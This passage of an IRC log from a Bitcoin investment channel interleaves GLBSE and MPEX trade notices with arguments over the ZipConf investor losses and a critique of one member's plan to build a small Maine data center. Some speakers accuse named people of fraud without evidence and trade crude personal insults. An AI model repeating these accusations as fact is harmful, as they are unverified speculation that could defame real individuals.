businesses?" Aug 16 22:43:32 For 99% of investors who could make Bitcoin happen, the answer is a resounding "NO." Aug 16 22:43:35 the cheek on this asshole. Aug 16 22:43:44 dude. i have not had a hack in a year. Aug 16 22:43:49 unlike anyone, including mtgox. Aug 16 22:43:58 how dares this asshole mingle me in his feting pool of failures. Aug 16 22:44:17 i think he hacked himself and he and mathew kept the investment money and ran Aug 16 22:44:28 that's no excuse for the sort of shit he's saying. Aug 16 22:44:32 incidentally investors love bitcoin. Aug 16 22:44:34 seems im not trustworthy of zipconf Aug 16 22:44:37 also deadt no offince but i think you were feed a bunch of BS. Aug 16 22:44:40 they don't love the sort of half baked shit that goes on on the forums, sure. Aug 16 22:44:41 if im not, not of people are Aug 16 22:44:44 but that IS NOT BITCOIN Aug 16 22:44:46 not a lot* Aug 16 22:44:56 I was feed a lot of bullshit, I was fooled and not told the whole truth. Aug 16 22:44:59 so i call it bs Aug 16 22:45:09 There is no way to know the truth unless it's proben. Aug 16 22:45:27 I am just saying what I am told, of course I don't know if ZipConf actually work. Aug 16 22:45:31 yeah, but working with crimanals like mathew and jro is fail in my book Aug 16 22:45:46 also i got a word from a source who have worked with zipconf Aug 16 22:46:07 they did some testing some time ago Aug 16 22:46:11 and that was it. Aug 16 22:47:56 I wouldn't say they are criminal, they are innocent until the opposite is true. Aug 16 22:48:04 [GLBSE] [BITBOND] 2 @ 0.39979999 = 0.7996 BTC [+] Aug 16 22:48:06 [GLBSE] [BITBOND] 4 @ 0.39989999 = 1.5996 BTC [+] Aug 16 22:48:55 mathew and zhou are in the same boat :) call them what you will lol Aug 16 22:50:02 [GLBSE] [YABMC] 1 @ 0.11 BTC [-] Aug 16 22:50:26 [MPEX] [F.GIGA.ETF] 5200 @ 0.00098397 = 5.1166 BTC [+] Aug 16 22:51:05 What I do agree on is that this whole thing has been run in a incorrect manner and with little respect to the investors money. Aug 16 22:51:18 With little to no communication and a sea of lies and cover ups Aug 16 22:51:37 DeaDTerra: who/> Aug 16 22:51:54 Yay my new keyboard is here :D Aug 16 22:52:06 $10 keyboard replacing $150 keyboard Aug 16 22:52:07 <3 Aug 16 22:53:11 [GLBSE] [FUTUREFUND] 900 @ 0.00011716 = 0.1054 BTC [+] Aug 16 22:53:23 who what? Aug 16 22:53:33 DeaDTerra: who fucked investors Aug 16 22:53:44 [MPEX] [S.MPOE] 21700 @ 0.00035871 = 7.784 BTC [-] Aug 16 22:54:18 obsi.1mhs: 19th, btc-mining: 20th, btcmc: 1st. Aug 16 22:54:19 meh Aug 16 22:55:29 JRO,Matthew and the whole crew in charge of ZipConf and Rebate. Aug 16 22:55:38 explains why their shit was locked Aug 16 22:57:06 Though I think JRO is planning to do whats right and repay the investor. Aug 16 22:57:11 at least thats what he says he will Aug 16 23:04:43 yeah but you know how that goes =/ Aug 16 23:05:01 [MPEX] [F.GIGA.ETF] 1370 @ 0.00097641 = 1.3377 BTC [-] Aug 16 23:05:08 [GLBSE] [PUREMINING] 5 @ 0.15388 = 0.7694 BTC [+] Aug 16 23:05:35 what i want to know is Aug 16 23:05:46 that kenna dude from tradehill who is owen's partner in some land development Aug 16 23:05:56 has he paid all his depositors in tradehill yet ? Aug 16 23:06:29 btw, guys Aug 16 23:06:31 [GLBSE] [ASICMINER] 3 @ 0.105 = 0.315 BTC [+] Aug 16 23:06:40 I'm paying 2 DMC for 1 ASICMINER, and 9 DMC for 1 BTC-MINING Aug 16 23:10:30 [MPEX] [S.MPOE] 25200 @ 0.00035871 = 9.0395 BTC [-] Aug 16 23:11:05 dmc .03ish and yet will trade 2 of them for an asset worth .1 lol Aug 16 23:11:12 i bet people are lined up for that. Aug 16 23:12:22 didn't it jump to .07 ? Aug 16 23:13:01 Im still accepting 15 1mh bonds/shares for 1 DMC as well Aug 16 23:13:07 any of them Aug 16 23:13:09 [GLBSE] [CBGB] 3 @ 0.49999999 = 1.5 BTC [+] Aug 16 23:13:11 [GLBSE] [CBGB] 2 @ 0.5 = 1 BTC [+] Aug 16 23:14:50 [GLBSE] [GIGAMINING] 1 @ 0.995 BTC [-] Aug 16 23:15:49 [GLBSE] [BITBOND] 1 @ 0.39989999 BTC [+] Aug 16 23:17:26 so basically you'll take anything to divest from your own company ? Aug 16 23:17:41 mircea_popescu: they're not my private shares. Aug 16 23:18:19 those you can pry out of my cold dead hands Aug 16 23:19:23 [GLBSE] [COGNITIVE] 7 @ 0.6309 = 4.4163 BTC [-] Aug 16 23:19:44 [GLBSE] [BTCMC] 40 @ 0.5 = 20 BTC [-] Aug 16 23:20:05 mircea_popescu: but the next size target for DMC is 15 mhash, so I'm trading accordingly Aug 16 23:20:20 i still don't comprehend your structure. Aug 16 23:20:50 basically, DMC is locking down the mh market and using the output to further fund the plan. Aug 16 23:20:52 giga's 5mh/s trade around 1, you want three of those, that's 3btc. Aug 16 23:21:11 the dmc is doing nothing to no market. it's 2k lifetime trade volume clearly indicate that. Aug 16 23:21:26 giga's are _worth_ about 0.15. Aug 16 23:21:41 mircea_popescu: btw, no Aug 16 23:21:49 the trade volume doesnt include shares trasferred Aug 16 23:22:48 well the problem we have here is this : you think yours worth 1, they go for .0x. you think his worth .05 they go for 1. Aug 16 23:22:58 so we'll have to leave your opinions on valuations aside for a moment. Aug 16 23:23:00 yeah, the market is irrational Aug 16 23:23:02 what exactly does dmc do ? Aug 16 23:23:07 [GLBSE] [BTCMC] 2 @ 0.55 = 1.1 BTC [+] Aug 16 23:23:12 mircea_popescu: have you not read the plan? Aug 16 23:23:29 your Full contract: on glbse is ridiculous. Aug 16 23:23:40 do you have a complement to that somewhere ? Aug 16 23:23:41 you havent read the plan then Aug 16 23:23:49 https://bitcointalk.org/index.php?topic=77469 Aug 16 23:23:49 [GLBSE] [NYAN] 7 @ 1 = 7 BTC [+] Aug 16 23:24:38 o i recall reading that and pointing out that you're too late for the 1mn bitcoin start-up. Aug 16 23:25:15 so basically you envisage a very capital intensive investment Aug 16 23:25:20 to cut down on operational costs. Aug 16 23:25:30 the problem with this is that the market is not mature enough to make that move yet. Aug 16 23:25:34 that's a move of commodification. Aug 16 23:26:29 [GLBSE] [BITBOND] 3 @ 0.39989999 = 1.1997 BTC [+] Aug 16 23:27:20 [GLBSE] [PAJKA.BOND] 10 @ 0.075 = 0.75 BTC [+] Aug 16 23:30:14 even in that paradigm, i don't understand why you'd be holding other people's paper. Aug 16 23:31:03 [GLBSE] [FZB.A] 100 @ 0.034 = 3.4 BTC [+] Aug 16 23:37:27 [GLBSE] [NASTY] 1 @ 0.5 BTC [-] Aug 16 23:38:08 [GLBSE] [GIGAMINING] 2 @ 1.03 = 2.06 BTC [+] Aug 16 23:42:36 [GLBSE] [BTCMC] 3 @ 0.55 = 1.65 BTC [+] Aug 16 23:49:57 [MPEX] [S.MPOE] 8200 @ 0.00035121 = 2.8799 BTC [-] Aug 16 23:52:30 [MPEX] [S.MPOE] 2023 @ 0.00034212 = 0.6921 BTC [-] Aug 16 23:53:08 mircea_popescu: well Aug 16 23:53:17 mircea_popescu: some people do agree with you on the market not being ready yet Aug 16 23:53:26 but someone has to be the first, and being the first is always hard Aug 16 23:53:33 as for holding other people's paper... its worth it. Aug 16 23:53:46 I cant have the hardware here at my house Aug 16 23:54:08 so Im effectively leasing it out from other people Aug 16 23:54:10 well i'll tell you this, unlike most everyone i don't think you're necessarily foolish. maybe a little haughty. the thing is, it's not enough for something to be hard to make it worth doing. Aug 16 23:54:23 commodification is a natural process, you can'd "do" it any more than you can rain. Aug 16 23:54:40 that still doesnt solve the problem Aug 16 23:54:43 someone still has to be the first Aug 16 23:55:12 I actually wanted to invest in someone else being the first... but there wasnt one Aug 16 23:55:24 theres no one else whos doing real world things at this large of a scale in the bitcoin world Aug 16 23:55:56 yes but there's a reason, see ? tghe reason is that it's much cheaper to test things out on a small scale. Aug 16 23:56:18 if they fail you don't end up with large capital costs writen off as losses this way. Aug 16 23:56:18 yes, but for what the plan covers... that IS a small scale. Aug 16 23:56:29 when google or amazon build a data center, its thousands of racks Aug 16 23:56:35 DMC's first one will be a few dozen Aug 16 23:56:57 the main problem still is how come you own other people's paper. Aug 16 23:57:11 if you ipo as a shoe factory you can't take the money and buy shoe factory shares in other factories Aug 16 23:57:16 you didn't ipo as a bank. Aug 16 23:57:18 [04:53:49] I cant have the hardware here at my house Aug 16 23:57:18 [04:54:11] so Im effectively leasing it out from other people Aug 16 23:57:28 mircea_popescu: no, but your example is _almost_ right Aug 16 23:57:30 well ya but you didn't say that originally. Aug 16 23:57:37 Tesla didnt have a car factory when they built their company Aug 16 23:57:47 they did business with another manufacturer to get it done Aug 16 23:57:51 now they can afford their own factory Aug 16 23:58:03 ya but they didn't actually ipo as a car factory Aug 16 23:58:08 they ipo'd as a car designer. Aug 16 23:58:13 they ipo'ed as a car manufacturer Aug 16 23:58:23 I'm ipo'ing as a company that does many things Aug 16 23:58:42 DMC is in a bad spot by being the first. We can't just leave the money sit Aug 16 23:58:48 and there are no large scale investment funds Aug 16 23:58:50 i think you'd have been a lot happier if that contract was better written tbh. Aug 16 23:58:53 even usagi's are too small Aug 16 23:59:00 mircea_popescu: probably Aug 16 23:59:03 but we have no bitlawyers. Aug 16 23:59:21 cause i think this "being in a bad spot for being first" is mostly self-pity. in fact, it's in a bad spot by poor communication with market. Aug 16 23:59:41 the market doesnt communicate well, so its not a one sided problem Aug 16 23:59:51 a lot of things have already gotten better because of DMC Aug 16 23:59:54 surely. the only thing is that the market we can do nothing about. Aug 17 00:00:00 only thing we can fix in this world is ourselves. Aug 17 00:00:20 DMC is making these small mistakes here and there, and others ARE learning from it Aug 17 00:00:23 this is a good thing Aug 17 00:00:25 what do you figure is going better because of dmc ? Aug 17 00:01:10 theres talk about other companies going the same route as DMC Aug 17 00:01:23 and that talk makes me very happy Aug 17 00:01:30 being devalued? Aug 17 00:01:30 talk. Aug 17 00:01:38 or other route Aug 17 00:01:39 kakobreklaa: bootstrapping through bitcoin Aug 17 00:01:43 if talk makes you happy you should spend time with whores. Aug 17 00:01:44 afk for a sec Aug 17 00:01:51 ... Aug 17 00:02:03 you can't seriously think you invented "bootstrapping" though bitcoin. Aug 17 00:05:03 you can't seriously think you can have a serious conversation about DMC Aug 17 00:05:13 you need to first smoke all teh rocks Aug 17 00:07:08 lol Aug 17 00:07:22 eh, why not. Aug 17 00:07:30 telnet twrhis1 Aug 17 00:07:36 shit Aug 17 00:08:08 omg diablo how on earth are you ever going to make 1M$ to make your company come true? Aug 17 00:08:19 mircea_popescu: because Diablo-D3 is delusional from all teh crack rocks he smoked Aug 17 00:08:26 im reading up on this jro drama. these forum idiots... ah god they're so friggin ridiculious. they're exactly but exactly like any other 30something incompetent but ambitious circlejerk. Aug 17 00:08:55 lmfao first 1 btc now 0.02, painfull investment Aug 17 00:09:00 it's sad what all the prep talks and "creativity" training has done to this generation. Aug 17 00:09:19 [GLBSE] [LTC-MINING] 1 @ 0.589 BTC [-] Aug 17 00:10:10 I can't even read about it Aug 17 00:10:36 I saw "Bitcoin Police" and closed the page Aug 17 00:10:41 what a fucking joke Aug 17 00:10:47 back Aug 17 00:10:52 you're missing out on some vaguely gay very pretentious stupidity. Aug 17 00:11:07 mircea_popescu: I didnt invent it bootstrapping through bitcoin, Im making people take it seriously Aug 17 00:11:27 wouldn't you think this is something better left to "people" to say ? Aug 17 00:11:49 [GLBSE] [BDT] 1 @ 0.99999898 BTC [+] Aug 17 00:12:22 mircea_popescu: if other companies are going to end up taking this route, then the people already have spoken Aug 17 00:12:47 [GLBSE] [YABMC] 1 @ 0.115 BTC [+] Aug 17 00:12:49 mno. i could just as well point out that it's because mpex went from 300k to ~5mn valuation, it's mpex that people are speaking about. Aug 17 00:12:57 fact of the matter is all this is pretty banal. a currency exists. Aug 17 00:13:15 the rest just follows. Aug 17 00:13:56 [GLBSE] [BDT] 20 @ 0.96 = 19.2 BTC [-] Aug 17 00:14:23 [GLBSE] [CIUCIU.BOND] 5 @ 0.09979 = 0.499 BTC [+] Aug 17 00:14:25 [GLBSE] [CIUCIU.BOND] 3 @ 0.0998 = 0.2994 BTC [+] Aug 17 00:14:27 [GLBSE] [CIUCIU.BOND] 7 @ 0.1 = 0.7 BTC [+] Aug 17 00:15:16 be that as it may, the problems with your design are that anyone can run the newer fpgas. the days when gpu's required competence from the operator are gone. Aug 17 00:15:29 as such, the benefits of making a large company out of many fpgas are neglectable Aug 17 00:15:41 and so people aren't really very interested in facing the cp risk involved. Aug 17 00:16:14 mircea_popescu: well, mining isnt even the issue Aug 17 00:16:29 selling datacenter space to customers who need high density computation is extremely profitable Aug 17 00:16:35 very few DCs in the US focus on this Aug 17 00:16:37 that may be. Aug 17 00:16:40 [GLBSE] [BDT] 4 @ 0.99999898 = 4 BTC [+] Aug 17 00:16:42 [GLBSE] [BDT] 4 @ 0.99999899 = 4 BTC [+] Aug 17 00:16:44 [GLBSE] [BDT] 5 @ 1 = 5 BTC [+] Aug 17 00:16:50 but again, it's not what you said you'll do. Aug 17 00:16:55 actually it is Aug 17 00:16:56 read the plan Aug 17 00:17:11 quote. Aug 17 00:17:14 don't bother, its retarded Aug 17 00:17:49 mircea_popescu: the only thing I need to do is add to the plan more specifics about the datacenter now that I've worked out the cost and planning for it Aug 17 00:17:59 but quote. Aug 17 00:18:09 mircea_popescu: first part of it Aug 17 00:18:11 The Facility Aug 17 00:18:43 The Facility Aug 17 00:18:43 A dedicated facility will be purchased or built on un-/under-developed land located in Maine due to our cold 6 months out of the year environment and lack of natural disasters. $150k will be set aside for this purpose as a soft estimate. Aug 17 00:18:50 you want to build a "facility". Aug 17 00:18:56 a data center. Aug 17 00:19:01 do you have any ideea how much... uh i dunno. gnax atlanta cost ? Aug 17 00:19:41 you can't build a detached family house for 150k in maine. Aug 17 00:19:53 you'd be surprised how cheap stuff is Aug 17 00:19:54 stop trying to approach this with logic Aug 17 00:19:56 the generators for a decent facility run in the millions. Aug 17 00:20:12 mircea_popescu: a full sized facility is a thousand or ten thousand racks Aug 17 00:20:16 a mid size up to par with current specs dc costs about 1bn atm. Aug 17 00:20:20 Im building one for several dozen racks. Aug 17 00:20:21 you are talking to a shut-in, who lives in a fantasy world of drawn japanese people and cronic masturabation Aug 17 00:20:35 there's a very good reason why there's no dcs made out for 50 racks Diablo-D3 Aug 17 00:20:37 mircea_popescu: Im quite aware how much backup generators and cooling cost. Aug 17 00:20:41 the same reason there's no 1/8th of a person cars Aug 17 00:20:45 [MPEX] [S.MPOE] 5077 @ 0.00034208 = 1.7367 BTC [-] Aug 17 00:20:46 [MPEX] [S.MPOE] 7423 @ 0.00035121 = 2.607 BTC [+] Aug 17 00:20:48 mircea_popescu: it is for a prototype. Aug 17 00:20:51 it works quite well. Aug 17 00:21:07 prototyping is a term of art. Aug 17 00:21:14 it is used to mean something very speciffic. Aug 17 00:21:20 to wit, that thing which people with a lot of money do. Aug 17 00:21:26 yes, and then the software industry stole the term Aug 17 00:21:28 if all you have is 100k and you spend 100k, you did not buy a prototype. Aug 17 00:21:43 on a total budget of 100k a prototype could cost at most 2-3k Aug 17 00:22:03 mircea_popescu: yes, and what would happen if I announced DMC would actually cost several billion? Aug 17 00:22:16 people would point out you're not qualified to handle several billion. Aug 17 00:22:17 are you ? Aug 17 00:22:34 wait till we get to teh bit where his real business case is green energy Aug 17 00:22:36 If Im not, then no one in the community is. Aug 17 00:22:44 which si true. nobody in the community is. Aug 17 00:22:53 which is also why people don't partner with "anyone in the community". Aug 17 00:22:54 mircea_popescu: the community has to start somewhere. Aug 17 00:23:12 yes. that somewhere however is not pretending to be and do things they aren't and can't do. Aug 17 00:23:16 mircea_popescu: which is why Im asking for a million, not a billion. Aug 17 00:23:22 thart's a great way to painfully die. Aug 17 00:24:22 dub nothing wrong with green energy. Aug 17 00:24:36 mircea_popescu: btw, were you referring atlantanap? Aug 17 00:25:07 mircea_popescu: sure, if you are an energy company Aug 17 00:25:09 no. Aug 17 00:25:25 got a url for the one you were thinking of? Aug 17 00:25:28 mircea_popescu: if you are an internet asshat.. Aug 17 00:25:36 a yes, yes. thart's what they call it. Aug 17 00:25:58 AtlantaNAP 1100 White Street, SW | Atlanta, GA 30310 Aug 17 00:26:01 yeah Aug 17 00:26:08 thats only 75k square feet Aug 17 00:26:36 it's not huge, by any means. Aug 17 00:26:57 I'd be surprised if it cost more than 25 million Aug 17 00:27:05 ... Aug 17 00:27:12 the paperwork is more than 25 million. Aug 17 00:27:16 sorry my 0 key isnt working Aug 17 00:27:20 250 million Aug 17 00:27:43 it was more, but anyway Aug 17 00:27:43 36,000 gallon storage tank to hold make-up water for cooling towers Aug 17 00:27:43 Private well to supply make-up water (well is backed up by city water) Aug 17 00:27:51 they had to make their own water supply and various other shits. Aug 17 00:27:56 yeah, Im not surprised Aug 17 00:27:58 there's a reason why projects are always over budget. Aug 17 00:28:04 mircea_popescu: btw Aug 17 00:28:06 re $150k Aug 17 00:28:11 Im seriously considering upping that to $250k Aug 17 00:28:21 although it may not look it, but I really have been pricing out what we need Aug 17 00:28:36 again, i have no doubt that you're earnestly trying. Aug 17 00:28:45 mining hardware will probably end up coming last. Aug 17 00:29:19 surprised they went with diesel powered generators though Aug 17 00:29:25 doesnt atlanta have natgas? Aug 17 00:29:35 you'd go with atomic ? Aug 17 00:29:46 gas was too difficult to get all the permits for iirc. Aug 17 00:29:52 ahh too bad Aug 17 00:30:02 i only have a vague recollection, anyway. Aug 17 00:30:06 bloomboxes are really nice from what Ive heard Aug 17 00:30:15 One 2 MW diesel-powered generator with static ATS. Aug 17 00:30:15 every customer who has them has been very happy with them Aug 17 00:30:34 (although I imagine bloom energy has been greatly gaming the PR aspect) Aug 17 00:30:55 anything new today? Aug 17 00:30:56 Factory price 2 mw diesel generator with CE ISO Aug 17 00:30:56 Other products by Output Type: AC Three Phase FOB Price: US $ 2,000 - 12,000 / Set Aug 17 00:30:59 on alibaba :D Aug 17 00:31:05 lol alibaba Aug 17 00:31:07 trust me. a 2mw costs more than 2-12k Aug 17 00:31:13 yeah no shit Aug 17 00:31:23 i'm just pointing out that pricing may be a little more difficult than it seems. Aug 17 00:31:28 heya smickles Aug 17 00:31:29 I mean fuck, look at a 1mw wind turbine Aug 17 00:31:36 thats $1m all said and done Aug 17 00:31:38 howdy mircea_popescu Aug 17 00:31:58 and obviously a wind turbine powered datacenter would be something very comical. Aug 17 00:32:24 Supply Ability: 2000 Set/Sets per Year Aug 17 00:32:24 Payment Terms: L/C,T/T,Western Union Aug 17 00:32:27 ahaha this is great. Aug 17 00:32:39 so this alibaba vendor can sell me 2k 2MW units per year Aug 17 00:32:42 payment via WU Aug 17 00:35:34 mircea_popescu: its not that comical Aug 17 00:35:46 i can see it now, Diablo-D3's warehouse with 1000 of these http://compare.ebay.com/like/300637929477?var=lv<yp=AllFixedPriceItemTypes&var=sbar Aug 17 00:35:48 maine forces the power companies to buy back power at high prices Aug 17 00:36:07 smickles: lol, small turbines are shit Aug 17 00:36:25 Diablo-D3: I'm installing ~$1m worth of gear in two racks in different DC's at the moment Aug 17 00:36:33 dub: haha awesome Aug 17 00:36:44 to cable out fibre and power is ~$88k Aug 17 00:36:57 mircea_popescu: but yeah, I really want to do combined solar and wind, but wind is going to be really fucking expensive for the budget Aug 17 00:36:57 four peices of kit Aug 17 00:37:04 dub: hawt Aug 17 00:37:20 Diablo-D3 did you ever work as tech in a dc ? Aug 17 00:37:50 a better question would be, has Diablo-D3 EVER worked Aug 17 00:38:00 mircea_popescu: no, but I know a surprisingly large number of people who do Aug 17 00:38:13 ok, why not ? Aug 17 00:38:24 why not? never had the chance. Aug 17 00:38:24 [GLBSE] [PUREASIC] 1 @ 0.74 BTC [+] Aug 17 00:38:33 ever applied for such a job ? Aug 17 00:38:41 I live in Maine, we dont have jobs like that up here Aug 17 00:38:52 what, you're rooted in maine ? Aug 17 00:38:58 people your age travel, it's only natural. Aug 17 00:39:12 mircea_popescu: although, Im glad I stayed Aug 17 00:39:22 i tell you, it's bizzare to want to bootstrap a taxicab company when you never ran a cab. Aug 17 00:39:44 mircea_popescu: ts not like Im ignorant to how these things are done Aug 17 00:39:51 i didn't say you were. Aug 17 00:40:05 i said you never had the opportunity to waste other people's money finding things out. Aug 17 00:40:13 it'll be a bitch to waste your own. Aug 17 00:40:21 well, to be fair Aug 17 00:40:25 if I had a million dollars in the bank Aug 17 00:40:28 I would have done it myself. Aug 17 00:40:37 im pretty sure of that, yeah. Aug 17 00:41:51 mircea_popescu: the most expensive part of this wont be the data cente though Aug 17 00:41:54 its the power generation Aug 17 00:42:19 the most expensive part of a project run by someone with great ambition and no experience is always the management. Aug 17 00:42:34 this is exceedingly well proven in teh history of business. Aug 17 00:42:44 of course, but this is why Im not doing it alone Aug 17 00:42:50 o ? Aug 17 00:42:56 I have people who are in the industry who are advising me on various points Aug 17 00:43:06 yet another thing the prospective investor would have not found out from yoru contract. Aug 17 00:43:14 you have any ideea what's the one thing investors hate ? Aug 17 00:43:20 mircea_popescu: glbse sucks. Aug 17 00:43:26 and I hope thats the number one thing. Aug 17 00:43:39 haha well, surprises i was gonna say Aug 17 00:43:42 but you tempt me so. Aug 17 00:44:01 seriously, glbse has room for a contract, but not anything else Aug 17 00:44:20 I mean, in the real world, we dont even have shit like this Aug 17 00:44:40 I dont go to NYSE's website to trade stocks, I go through a broker, and most brokers barely list any info about companies Aug 17 00:44:49 you have to go to the company website to learn anything Aug 17 00:45:11 well, brokering is hard work and requires a large set of rare skills. Aug 17 00:45:18 yes it does Aug 17 00:45:20 i been trying to get it going, but it's slow. Aug 17 00:45:27 so does making the stock exchange itself Aug 17 00:45:30 i suppose it's not flashy enough for kids today. Aug 17 00:45:46 I think what I should do is just bust out a web 2.0'ey kind of website for DMC Aug 17 00:45:58 and just solve all the problems Aug 17 00:46:13 mircea_popescu: I mean, you're right, investors hate surprises Aug 17 00:46:22 _I_ don't like surprises. Aug 17 00:46:40 it stands to reason you should make a website before registering the security, actually. why not ? a blog is five minutes' work. Aug 17 00:46:55 blogs dont sell. Aug 17 00:47:16 but your company has a site now. news can be published, people can ask you questions. Aug 17 00:47:17 and the reason I didnt have a website first is because thats not how things have been done in bitcoin Aug 17 00:47:31 its always been bitcointalk threads only Aug 17 00:47:35 and it just doesnt work Aug 17 00:47:43 its doing more harm to glbse companies than good Aug 17 00:48:21 [MPEX] [F.GIGA.ETF] 6507 @ 0.00078056 = 5.0791 BTC [-] Aug 17 00:48:39 well that'd have been a great point to innovate. Aug 17 00:48:54 whoa jesus ?! that bad ? .78 ?! Aug 17 00:49:20 ;;ticker Aug 17 00:49:21 Best bid: 13.34997, Best ask: 13.34998, Bid-ask spread: 0.00001, Last trade: 13.34999, 24 hour volume: 103091, 24 hour low: 12.5, 24 hour high: 13.84119 Aug 17 00:49:33 so close to 13.37 <3 Aug 17 00:49:35 [MPEX] [F.GIGA.ETF] 393 @ 0.00078056 = 0.3068 BTC [-] Aug 17 00:49:37 [MPEX] [F.GIGA.ETF] 10700 @ 0.00078125 = 8.3594 BTC [+] Aug 17 00:49:37 lol Aug 17 00:49:38 [MPEX] [F.GIGA.ETF] 600 @ 0.00079934 = 0.4796 BTC [+] Aug 17 00:49:39 [MPEX] [F.GIGA.ETF] 24861 @ 0.00080303 = 19.9641 BTC [+] Aug 17 00:49:39 [MPEX] [F.GIGA.ETF] 15630 @ 0.00095137 = 14.8699 BTC [+] Aug 17 00:49:40 [MPEX] [F.GIGA.ETF] 7816 @ 0.00098397 = 7.6907 BTC [+] Aug 17 00:49:52 Diablo-D3: it was 1337 on btccharts.. Aug 17 00:50:05 mircea_popescu: but yeah, the thread just doesnt sell it Aug 17 00:50:21 [GLBSE] [YABMC] 4 @ 0.115 = 0.46 BTC [+] Aug 17 00:50:24 [MPEX] [S.BVPS] 450 @ 0.00389519 = 1.7528 BTC [+] Aug 17 00:50:26 Ive been selling it by hand, but thats just not an efficient use of my time Aug 17 00:51:03 well another part of the problem is that there's very little analysis work done Aug 17 00:51:08 or should i say, publicly released. Aug 17 00:51:25 I agree Aug 17 00:51:29 but Im not quite done with it either. Aug 17 00:51:34 ALTHOUGH Aug 17 00:51:37 theres stuff buried in the thread Aug 17 00:51:53 but that just adds to the fact I hate how that works Aug 17 00:52:23 mircea_popescu: I want DMC to be more collaborative than it is Aug 17 00:52:29 bitcointalk is dysfunctional because it creates this false sense of community Aug 17 00:52:35 bitcoin is a currency, not a post count. Aug 17 00:52:38 but theres only been like 2 shareholders who bother being vocal Aug 17 00:52:50 exactly Aug 17 00:52:56 it doesnt work Aug 17 00:53:09 [GLBSE] [ASICMINER] 22 @ 0.105 = 2.31 BTC [+] Aug 17 00:53:16 well, part of the nonvocal non collaborative etc is that you get bristly when people say things. Aug 17 00:53:41 meh, Im that kind of person Aug 17 00:53:51 although, the best companies in the world have been ran by asshole CEOs Aug 17 00:54:14 i am an asshole. there's a difference between asshole and that. Aug 17 00:55:08 [MPEX] [S.MPOE] 57200 @ 0.00034038 = 19.4697 BTC [-] Aug 17 00:55:09 [MPEX] [S.MPOE] 5800 @ 0.00033685 = 1.9537 BTC [-] Aug 17 00:55:11 [GLBSE] [SYNERGY] 1 @ 0.189 BTC [-] Aug 17 00:55:37 mircea_popescu: I'd be what pg calls a technical founder Aug 17 00:55:48 [MPEX] [S.MPOE] 18782 @ 0.00035121 = 6.5964 BTC [+] Aug 17 00:55:50 [MPEX] [S.MPOE] 600 @ 0.00035871 = 0.2152 BTC [+] Aug 17 00:55:50 [MPEX] [S.MPOE] 43600 @ 0.00038342 = 16.7171 BTC [+] Aug 17 00:55:51 [MPEX] [S.MPOE] 44101 @ 0.00038389 = 16.9299 BTC [+] Aug 17 00:55:53 [MPEX] [S.MPOE] 42917 @ 0.0003965 = 17.0166 BTC [+] Aug 17 00:56:07 I know everything needed backwards and forwards, but I dont have a userfriendly interface Aug 17 00:56:37 you know everything needed for building a dc backwards and forwards ? Aug 17 00:56:48 surprisingly yes. Aug 17 00:56:55 and what I dont know can easily be purchased. Aug 17 00:57:05 its not like Im going out there with a trow and some bricks Aug 17 00:57:28 [GLBSE] [GIGAMINING] 2 @ 0.980001 = 1.96 BTC [-] Aug 17 00:57:45 well... in maine... i can see it. bricks, trow, Aug 17 00:57:59 I'll be hiring companies every step of the way to do the work Aug 17 00:58:31 out of 150k ?! Aug 17 00:59:01 like I said, the $150k estimate may have been wrong Aug 17 00:59:07 I was just going to do just a dozen racks Aug 17 00:59:12 [GLBSE] [OBSI.HRPT] 39 @ 0.10151001 = 3.9589 BTC [-] Aug 17 00:59:16 but its not representative of the problem at that small of a size Aug 17 00:59:19 what if one of these subcontractors fucks you over ? Aug 17 00:59:36 [GLBSE] [GIGAMINING] 10 @ 0.98 = 9.8 BTC [-] Aug 17 00:59:40 then I get a crash course in suing. Aug 17 00:59:53 a crash course in suing ? Aug 17 01:00:03 interesting concept. Aug 17 01:00:11 as in, I hire a lawyer. Aug 17 01:00:26 mircea_popescu: nothing ever goes smoothly Aug 17 01:00:27 a lawyer practicing corporate may cost you 10k just to hear your case. Aug 17 01:00:31 its a rule Aug 17 01:00:35 I expect something to go wrong Aug 17 01:00:39 im not sure what the bar is like in maine. Aug 17 01:00:53 but in ma it's about there. not even a good one. Aug 17 01:01:22 [GLBSE] [GIGAMINING] 2 @ 1.02999 = 2.06 BTC [+] Aug 17 01:01:45 [GLBSE] [GIGAMINING] 1 @ 1.02999 BTC [+] Aug 17 01:01:47 [GLBSE] [GIGAMINING] 15 @ 0.978 = 14.67 BTC [-] Aug 17 01:03:01 [GLBSE] [GIGAMINING] 1 @ 0.978 BTC [-] Aug 17 01:03:24 mircea_popescu: this is why a small one is being done first Aug 17 01:03:31 even if a subcontractor fucks up, it limits the scope of the damage Aug 17 01:03:47 yea well, it's a little like playing poker. Aug 17 01:04:00 they won't likely be able to resist stiffing you, seeing how you're a new face on a bugdet. Aug 17 01:05:30 Diablo-D3: my project budget has more than half your budget (over $85k) just for contingency Aug 17 01:05:35 [GLBSE] [GIGAMINING] 2 @ 0.97251 = 1.945 BTC [-] Aug 17 01:05:54 dub: well, its a soft estimate Aug 17 01:05:57 to reiterate, this is four (4) elements in two (2) racks Aug 17 01:06:01 [GLBSE] [OBSI.HRPT] 30 @ 0.10151 = 3.0453 BTC [-] Aug 17 01:06:02 although I should have just went with $250k Aug 17 01:06:14 yeah, all Im doing is putting the racks there Aug 17 01:06:20 we have 85K set aside for stuff that might crop up Aug 17 01:06:23 its people like you who'd do business with me Aug 17 01:06:43 I have _the entire budget_ set aside for stuff that might crop up Aug 17 01:06:51 its an entirely scalable design. Aug 17 01:06:54 spending >$88k on cabling alone Aug 17 01:06:55 [GLBSE] [OBSI.HRPT] 11 @ 0.1015 = 1.1165 BTC [-] Aug 17 01:07:12 if I burn more money in one spot, I buy less somewhere else Aug 17 01:07:20 that doesnt include optics, jsut DC power, fiber and a little cat5 Aug 17 01:07:25 dub what are you putting in there anyway ? Aug 17 01:07:35 [GLBSE] [GIGAMINING] 4 @ 0.9725 = 3.89 BTC [-] Aug 17 01:07:42 yeah, wtf are you doing Aug 17 01:07:50 I can get a 1000 foot spool of cat6a and not spend that much money Aug 17 01:08:09 augmentign a small city with extra 10G capacity, a couple of routers and switches Aug 17 01:08:44 oh and that cabling is inside plant only, cross town fiber is seperate Aug 17 01:08:48 a you're doing fiber hook-ups Aug 17 01:08:48 [GLBSE] [SYNERGY] 6 @ 0.165 = 0.99 BTC [-] Aug 17 01:09:11 hrm, twitter bootstrap kind of sucks Aug 17 01:09:40 I wonder if the new foundation is any good Aug 17 01:09:42 [GLBSE] [GIGAMINING] 2 @ 1.02999 = 2.06 BTC [+] Aug 17 01:11:05 [GLBSE] [FUTUREFUND] 200 @ 0.00011716 = 0.0234 BTC [+] Aug 17 